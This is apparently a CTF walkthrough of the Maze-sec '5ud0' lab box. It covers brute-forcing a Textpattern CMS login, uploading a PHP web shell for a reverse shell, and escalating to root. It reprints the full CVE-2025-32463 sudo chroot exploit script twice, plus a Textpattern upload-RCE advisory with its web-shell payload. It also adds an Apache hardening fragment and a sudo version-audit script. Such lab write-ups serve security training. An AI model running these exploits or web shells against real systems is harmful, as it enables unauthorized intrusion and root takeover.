5ud0

Target description

QQ group: 660930334

1. Host discovery

┌──(root㉿kali)-[/miao/maze-sec/5ud0]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-15 15:41 CST
Nmap scan report for 192.168.2.1
Host is up (0.00043s latency).
MAC Address: 0A:00:27:00:00:0A (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00079s latency).
MAC Address: 08:00:27:0E:81:B3 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.58
Host is up (0.00071s latency).
MAC Address: 08:00:27:23:05:B0 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.06 seconds

Target IP: 192.168.2.58

2. Port scanning

1) Full TCP port scan

┌──(root㉿kali)-[/miao/maze-sec/5ud0]
└─# nmap --min-rate 10000 -p- 192.168.2.58
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-15 15:42 CST
Nmap scan report for 192.168.2.58
Host is up (0.00085s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:23:05:B0 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 5.79 seconds

Open ports: 22, 80

2) Service and version scan

┌──(root㉿kali)-[/miao/maze-sec/5ud0]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80 192.168.2.58
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-15 15:43 CST
Nmap scan report for 192.168.2.58
Host is up (0.00064s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 10.0p2 Debian 5 (protocol 2.0)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-title: My site
|_http-server-header: Apache/2.4.62 (Debian)
|_http-generator: Textpattern CMS
MAC Address: 08:00:27:23:05:B0 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.44 seconds

The site runs Textpattern CMS 4.8.7.

3) UDP port scan

┌──(root㉿kali)-[/miao/maze-sec/5ud0]
└─# nmap -sU --top-ports 100 192.168.2.58
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-15 15:43 CST
Nmap scan report for 192.168.2.58
Host is up (0.00057s latency).
All 100 scanned ports on 192.168.2.58 are in ignored states.
Not shown: 61 closed udp ports (port-unreach), 39 open|filtered udp ports (no-response)
MAC Address: 08:00:27:23:05:B0 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 57.68 seconds

No open UDP ports.

3. Web exploitation

Browsing port 80 reveals the domain textpattern.dsz; add it to the hosts file.

A login form is found.

1) Password brute force

A password brute-force attempt succeeds and recovers the credentials admin:superman.

2) File upload

Find the file upload feature, upload a shell, and note the path of the uploaded file: /files/rev.php.

3) Obtaining a www-data shell

┌──(root㉿kali)-[/miao/maze-sec/5ud0]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.58] 44504
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/usr/bin/script -qc /bin/bash /dev/null
www-data@5ud0:/var/www/html/files$ ^Z
zsh: suspended nc -lvnp 4444

┌──(root㉿kali)-[/miao/maze-sec/5ud0]
└─# stty raw -echo;fg
[1] + continued nc -lvnp 4444
reset
reset: unknown terminal type unknown
Terminal type? xterm
www-data@5ud0:/var/www/html/files$ uid=33(www-data) gid=33(www-data) groups=33(www-data)

USER FLAG

www-data@5ud0:/home/todd$ cat user.txt 
flag{user-80e68759-1ca0-45eb-82a7-601b1f78dfe5}

4. Privilege escalation

CVE-2025-32463 sudo privilege escalation

Listing SUID files shows two sudo binaries:

www-data@5ud0:/var/www/html/files$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/passwd
/usr/local/bin/sudo
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1

Check which sudo the system currently resolves:

www-data@5ud0:/var/www/html/files$ which sudo
/usr/local/bin/sudo

Check the version of each sudo:

www-data@5ud0:/var/www/html/files$ /usr/local/bin/sudo -V
Sudo version 1.9.6
Sudoers policy plugin version 1.9.6
Sudoers file grammar version 48
Sudoers I/O plugin version 1.9.6
Sudoers audit plugin version 1.9.6

www-data@5ud0:/var/www/html/files$ /usr/bin/sudo -V
Sudo version 1.9.16p2
Sudoers policy plugin version 1.9.16p2
Sudoers file grammar version 50
Sudoers I/O plugin version 1.9.16p2
Sudoers audit plugin version 1.9.16p2

The version of /usr/bin/sudo falls within the range affected by CVE-2025-32463.

Verify the vulnerability; it is present:

www-data@5ud0:/var/www/html/files$ /usr/bin/sudo -R woot woot
sudo: woot: No such file or directory

Escalate privileges using the exploit:

#!/bin/bash
# sudo-chwoot.sh
# CVE-2025-32463 – Sudo EoP Exploit PoC by Rich Mirch
# @ Stratascale Cyber Research Unit (CRU)
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd ${STAGE?} || exit 1

if [ $# -eq 0 ]; then
# If no command is provided, default to an interactive root shell.
CMD="/bin/bash"
else
# Otherwise, use the provided arguments as the command to execute.
CMD="$@"
fi

# Escape the command to safely include it in a C string literal.
# This handles backslashes and double quotes.
CMD_C_ESCAPED=$(printf '%s' "$CMD" | sed -e 's/\\/\\\\/g' -e 's/"/\\"/g')

cat > woot1337.c<<EOF
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void woot(void) {
setreuid(0,0);
setregid(0,0);
chdir("/");
execl("/bin/sh", "sh", "-c", "${CMD_C_ESCAPED}", NULL);
}
EOF

mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c

echo "woot!"
sudo -R woot woot  # must be changed to the vulnerable sudo binary (/usr/bin/sudo on this box; plain "sudo" resolves to /usr/local/bin/sudo)
rm -rf ${STAGE?}

Getting root:

www-data@5ud0:/var/www/html/files$ chmod +x sudo-chwoot.sh 
www-data@5ud0:/var/www/html/files$ ./sudo-chwoot.sh
woot!

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.

For security reasons, the password you type will not be visible.

[sudo] password for www-data:    # enter any password
root@5ud0:/# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
root@5ud0:/#

ROOT FLAG

root@5ud0:/root# cat root.txt 
flag{root-257f425d-1ea4-4b8e-8dd8-69523f25d249}

Summary

1) Textpattern CMS 4.8.7 file upload

Exploit

# Exploit Title : TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated)
# Date : 2021/09/06
# Exploit Author : Mert Daş merterpreter@gmail.com
# Software Link : https://textpattern.com/file_download/113/textpattern-4.8.7.zip
# Software web : https://textpattern.com/
# Tested on: Server : Xampp

First of all, we should use the file upload section to upload our shell.
Our shell contains this malicious code: <?PHP system($_GET['cmd']);?>

1) Go to the Content section.
2) Click Files and upload the malicious PHP file.
3) Go to yourserver/textpattern/files/yourphp.php?cmd=yourcode;

After uploading our file, our request and response are like below:

Request:

GET /textpattern/files/cmd.php?cmd=whoami HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: txp_login_public=18e9bf4a21admin; language=en-gb; currency=GBP; PHPSESSID=cctbu6sj8571j2t6vp7g8ab7gi
Upgrade-Insecure-Requests: 1


Response:

HTTP/1.1 200 OK
Date: Thu, 10 Jun 2021 00:32:41 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.20
X-Powered-By: PHP/7.4.20
Content-Length: 22
Connection: close
Content-Type: text/html; charset=UTF-8

pc\mertdas
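The underlying weakness is that the upload directory is served by the PHP handler, so any uploaded .php file executes. The simplest server-side mitigation is to refuse PHP execution there. This Apache fragment is an added example, not part of the writeup or of Textpattern; it assumes the document root /var/www/html and the upload directory /var/www/html/files seen on this box.

```apacheconf
# Assumed paths: document root /var/www/html, Textpattern upload dir /var/www/html/files
<Directory "/var/www/html/files">
    # Refuse to serve any PHP-like file from the upload directory at all,
    # so an uploaded rev.php returns 403 instead of executing.
    <FilesMatch "\.(php[0-9]?|phtml|phar)$">
        Require all denied
    </FilesMatch>
    # No CGI execution and no server-side includes from user-supplied content
    Options -ExecCGI -Includes
    # Do not let a stray .htaccess in the upload dir re-enable any of the above
    AllowOverride None
</Directory>
```

Restart Apache after adding it and confirm with a GET for an existing uploaded .php file that the server now answers 403 rather than running it.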

2) CVE-2025-32463 sudo privilege escalation

The vulnerability allows a local attacker to trick sudo, via the -R (--chroot) option, into loading an arbitrary shared library from a user-specified root directory and thereby escalate privileges. On systems that support /etc/nsswitch.conf, an attacker can run arbitrary commands as root and take control of the system (install malware, steal data, compromise system integrity).

| Metric            | CVE-2025-32463                                                                                   | CVE-2025-32462                                                                                   |
|-------------------|--------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------|
| CVSS 3.1 score    | 9.3 (Critical)                                                                                   | 7.0 (Medium)                                                                                     |
| Attack complexity | Low (default configuration)                                                                      | Medium (non-default configuration)                                                               |
| Core risk         | Local user -> root escalation; chroot path isolation failure leads to loading a malicious NSS library | Bypass of sudo rule restrictions; symlink resolution flaw leads to executing unauthorized commands |
| Affected versions | Sudo 1.9.14 - 1.9.17                                                                             | Sudo 1.9.15 - 1.9.16                                                                             |
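A defender's check for this box and for the version table above: the lesson from this writeup is that `which sudo` returned the patched 1.9.6 build while the setuid /usr/bin/sudo was the affected one, so an audit has to enumerate every setuid sudo, not just the one in PATH. The script below is an added example, not part of the writeup or of the sudo project; it treats 1.9.14 through 1.9.17 as affected and 1.9.17p1 (the upstream fix) as clean.

```shell
#!/bin/sh
# Added audit helper, not part of the original writeup. It lists every setuid
# sudo binary on the host (the writeup found two, and the one in PATH was not
# the vulnerable one) and flags versions inside the CVE-2025-32463 window:
# 1.9.14 up to and including 1.9.17, fixed upstream in 1.9.17p1.

# Turn "MAJOR.MINOR.PATCH[pN]" into one integer so versions compare numerically;
# returns 2 when the string does not look like a sudo version.
sudo_version_key() {
    case $1 in [0-9]*.[0-9]*) ;; *) return 2 ;; esac
    base=${1%%p*}
    plevel=${1#"$base"}; plevel=${plevel#p}
    set -- $(printf '%s' "$base" | tr . ' ')
    echo $(( ${1:-0} * 1000000 + ${2:-0} * 10000 + ${3:-0} * 100 + ${plevel:-0} ))
}

# Exit 0 when the version lies in [1.9.14, 1.9.17p1).
sudo_version_affected() {
    key=$(sudo_version_key "$1") || return 2
    [ "$key" -ge 1091400 ] && [ "$key" -lt 1091701 ]
}

# Pull "1.9.16p2" out of `sudo -V` output read from stdin.
parse_sudo_version() {
    sed -n 's/^Sudo version //p' | head -n 1
}

# Walk every setuid file named sudo and print: path, version, AFFECTED|ok|unknown.
# Compare the result with `command -v sudo` to see which binary a shell resolves.
audit_sudo_binaries() {
    find / -xdev -type f -perm -4000 -name sudo 2>/dev/null | while read -r bin; do
        ver=$("$bin" -V 2>/dev/null | parse_sudo_version)
        if [ -z "$ver" ]; then state=unknown
        elif sudo_version_affected "$ver"; then state=AFFECTED
        else state=ok
        fi
        printf '%s %s %s\n' "$bin" "${ver:-?}" "$state"
    done
}

# Run the audit only when invoked as: sh sudo-audit.sh --run
case ${1:-} in --run) audit_sudo_binaries ;; esac
```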

Exploit

#!/bin/bash
# sudo-chwoot.sh
# CVE-2025-32463 – Sudo EoP Exploit PoC by Rich Mirch
# @ Stratascale Cyber Research Unit (CRU)
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd ${STAGE?} || exit 1

if [ $# -eq 0 ]; then
# If no command is provided, default to an interactive root shell.
CMD="/bin/bash"
else
# Otherwise, use the provided arguments as the command to execute.
CMD="$@"
fi

# Escape the command to safely include it in a C string literal.
# This handles backslashes and double quotes.
CMD_C_ESCAPED=$(printf '%s' "$CMD" | sed -e 's/\\/\\\\/g' -e 's/"/\\"/g')

cat > woot1337.c<<EOF
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void woot(void) {
setreuid(0,0);
setregid(0,0);
chdir("/");
execl("/bin/sh", "sh", "-c", "${CMD_C_ESCAPED}", NULL);
}
EOF

mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c

echo "woot!"
sudo -R woot woot  # mind the path: this must be the vulnerable sudo binary
rm -rf ${STAGE?}

5ud0
http://miao-sec.github.io/Maze-sec/5ud0/
Author: Miao
Published: 16 July 2025
License: BY-MIAO